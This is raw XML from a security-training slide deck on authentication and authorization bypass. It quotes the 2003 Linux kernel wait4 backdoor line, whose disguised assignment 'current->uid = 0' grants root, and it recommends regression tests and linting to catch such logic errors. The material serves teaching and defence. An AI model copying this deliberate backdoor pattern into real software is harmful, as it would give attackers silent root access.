              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In 2003, a backdoor was inserted into the Linux kernel that allowed privilege escalation to the root user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>if ((options == (__WCLONE|__WALL)) &amp;&amp; (current-&gt;uid = 0))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>	        retval = -EINVAL;</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>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Linux Kernel Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1320" name="Google Shape;1320;p189"/>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b="1"/>
              <a:t>Authentication bypasses are not always unintentional</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In 2003, a backdoor was inserted into the Linux kernel that allowed privilege escalation to the root user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>if ((options == (__WCLONE|__WALL)) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>current-&gt;uid = 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	        retval = -EINVAL;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If wait4 was called with certain arguments, it would set the user to root</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Found because the commit didn’t go through the normal review process</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1326" name="Google Shape;1326;p190"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="71025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b="1"/>
              <a:t>There is no general technique for avoiding AuthN bypass</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Many bypasses are the result of logic bugs so build regression tests :)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Unit tests can validate that routes require authentication</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Test:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> GET /users with a valid auth token returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00B000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00B000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Test:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> GET /users without a valid auth token returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>401</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Static code analysis and linting can help find </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>boolean logic errors</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Error:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Using = instead of == in an if-statement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Error: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Missing a break statement in a switch()</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1327" name="Google Shape;1327;p190"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7044100" y="1098999"/>
            <a:ext cx="2413625" cy="241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37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4362600" cy="34164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sz="1800" b="1"/>
              <a:t>Cryptographic Keys</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>SSH Private Keys</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>PGP Private Keys</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>SSL/TLS Private Keys</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Data encryption keys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>Authentication Credentials</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Passwords</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Answers to password reset questions</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>API tokens</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>AWS access keys </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931" name="Google Shape;931;p137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5166975" y="1419650"/>
            <a:ext cx="3611100" cy="2571900"/>
          </a:xfrm>
          <a:prstGeom prst="rec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Kind of Secrets Are Used Day-to-Day?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="933" name="Google Shape;933;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="8711" r="12305"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997040" y="1583740"/>
            <a:ext cx="3611050" cy="2571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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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91"/>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Authorization Bypass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Authorization Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verifying a User Has </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a Right to Perform an Action</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1338" name="Google Shape;1338;p192"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="83352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b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Client: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hello. I am Mark. Here’s my session ID. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>		I want to access &lt;something&gt;.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Server:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 	Hello Mark. I looked up your SID and you &lt;do/do not&gt; have</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>		permission to access &lt;the thing&gt;.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204369" y="3238291"/>
            <a:ext cx="1427075" cy="14224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is it Bypassed?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345" name="Google Shape;1345;p193"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="799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Authentication bypasses may result from:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Faulty/missing authorization logic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Simple oversight (e.g. forgetting to annotate a function/route)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Weak session IDs/cryptography</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Outdated software/missing patches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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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94"/>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Authorization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1351" name="Google Shape;1351;p194"/>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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Authorization is usually implemented as...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1352" name="Google Shape;1352;p194"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889725" y="1959800"/>
            <a:ext cx="5437800" cy="2650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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Role-based</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Permissions-based</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
